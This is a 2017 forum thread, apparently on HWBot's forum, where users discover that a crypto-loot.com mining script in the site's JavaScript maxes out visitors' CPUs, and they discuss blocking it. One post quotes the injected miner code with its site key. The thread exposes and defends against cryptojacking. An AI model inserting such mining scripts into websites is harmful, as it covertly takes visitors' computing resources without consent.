Drachenlord Posted October 29, 2017 Posted October 29, 2017 (edited) Shame on u HWBot! This is evan a .org domain. Its not a shady Warez Website its a "Organization" Where overclockers Around the World compete against each other, Official Worldrecords get Posted.... youtu.be/R2X0XoXqfnA Edited October 29, 2017 by Drachenlord
Mr.Scott Posted October 29, 2017 Posted October 29, 2017 Quick to blame HWB for your malware infection. lol
Drachenlord Posted October 29, 2017 Author Posted October 29, 2017 i dont think so, This is a Fresh Win install, and only 3. Party Software is like Prime CPU-Z 3D Matk origin and stuff
Guest Wimpzilla Posted October 29, 2017 Posted October 29, 2017 (edited) Hello, I checked, on my side the forum and website do not bring any UC usage after the page was loaded, under firefox. I use obviously some AD/trackers blockers. Also maybe as it had been suggested run an anti-malware just for the sake. Edited October 29, 2017 by Wimpzilla
Drachenlord Posted October 29, 2017 Author Posted October 29, 2017 i did a scan with Defender and Malewarebytes. 0 founds... as expected its a absolute Fresh win 10 Install! HWBot is the Only Website which i have this Incident with. And see there This website uses the Service of "crypto-loot.com" to Mine Digital Currencys with my CPU without asking me.
mickulty Posted October 29, 2017 Posted October 29, 2017 Jokot apparently has the exact same issue on opera of all browsers, using only the built-in ad blocking. It's fine for me on firefox with adblock plus. EDIT: Same issue appears for me with adblock plus disabled on forum.hwbot.org
Jokot Posted October 29, 2017 Posted October 29, 2017 I have same problem... https://imgur.com/a/xwNBo didn't notice until i open 2 tabs and my mouse and every thing just froze for like 10 seconds.
Guest Wimpzilla Posted October 29, 2017 Posted October 29, 2017 Yeah as expected AD block/Ublock do not allow the crypto sfuff to run, if disabled same issue there. Nice catch, ty for sharing!
Drachenlord Posted October 29, 2017 Author Posted October 29, 2017 lol Seems Like im almost the only user on HWBot without an Adblocker. Did you know that most websites live from advertising? Noone should use an Adblocker in my Opinion! BTT: I'm very worried about that the "organization" HWBot.org has enriched itself at the expense of its users in an obviously illigal way
Guest Wimpzilla Posted October 29, 2017 Posted October 29, 2017 In a respectful world of human being you could be right, in the world you actually live in you are completely wrong. Please, do not jump to a conclusion too fast wait an answer from the admins about.
Drachenlord Posted October 29, 2017 Author Posted October 29, 2017 Yeah your right, Maybe its just the Fault of the Advertising Service HWBot is using. im sry in that Case. OT: i stopped using Adblockers back in 2011 on all of my Devices and im Doing fine
Rave Posted October 29, 2017 Posted October 29, 2017 Couldn't replicate this issue on chrome or chromium with or without adblock, however with firefox...
Guest Wimpzilla Posted October 29, 2017 Posted October 29, 2017 I think chrome have an adblock integrated to the browser, added recently if i member well. @Drachenlord:
DrDominodog51 Posted October 29, 2017 Posted October 29, 2017 I just tested this in Firefox. Noscript states a script from crypto-loot .com is attempting to run. Try adding that domain to your hosts file.
Jokot Posted October 29, 2017 Posted October 29, 2017 Ive been using the built in adblocker in opera which didn't seam to block what ever was running, but after installing no coin the problem was fixed.
havli Posted October 29, 2017 Posted October 29, 2017 Yeah, same here - 100% CPU usage (Firefox). Only on forums though - the main hwbot.org page seems to be clean.
Mr.Scott Posted October 29, 2017 Posted October 29, 2017 i did a scan with Defender and Malewarebytes. 0 founds... as expected its a absolute Fresh win 10 Install! HWBot is the Only Website which i have this Incident with. And see there This website uses the Service of "crypto-loot.com" to Mine Digital Currencys with my CPU without asking me. Interesting. I run Ublock Origin on everything, that's why I don't see it. Thanks for the info. It does seem a bit underhanded.
Alan_Alberino Posted October 29, 2017 Posted October 29, 2017 Same here, Opera using 100% CPU when I enter this forum... Only on this website, strange
I.nfraR.ed Posted October 29, 2017 Posted October 29, 2017 (edited) I can confirm! Very shady practice. I'm really disappointed. Does not affect me, since I use blockers, but... After disabling uBlock Origin on hwbot forum, CPU goes to 100% on all cores. Edited October 29, 2017 by I.nfraR.ed
suzuki Posted October 29, 2017 Posted October 29, 2017 This is the way to get the annual fee from members. ) Sent from my iPhone using Tapatalk Pro
I.nfraR.ed Posted October 29, 2017 Posted October 29, 2017 (edited) Look what happens once you allow it by disabling adblock and re-enabling it: Trying to do fetch every 1-2 second You should clear browser cache, close browser and open again to see it go. Code var miner = new CryptoLoot.Anonymous('5fc6284524573c64cd093a71e70bae0a08af8742562a'); miner.start()"); Edited October 29, 2017 by I.nfraR.ed
Administrators websmile Posted October 29, 2017 Administrators Posted October 29, 2017 Thanks for the tipp, Ivan, I already thought my cpu dies or my OS. I use adblock plus but it did not help on ff, only disabling and reenabling it worked then. Let´s see what Massman can do about this
I.nfraR.ed Posted October 29, 2017 Posted October 29, 2017 I hope this is not an inside job without warning users and it is some kind of hack. It is coming from the global vbulletin JS file.
Members GeorgeStorm Posted October 29, 2017 Members Posted October 29, 2017 Not cool, especially so if it's deliberate. And even more so when people have offered to start paying a yearly fee to help with costs etc!
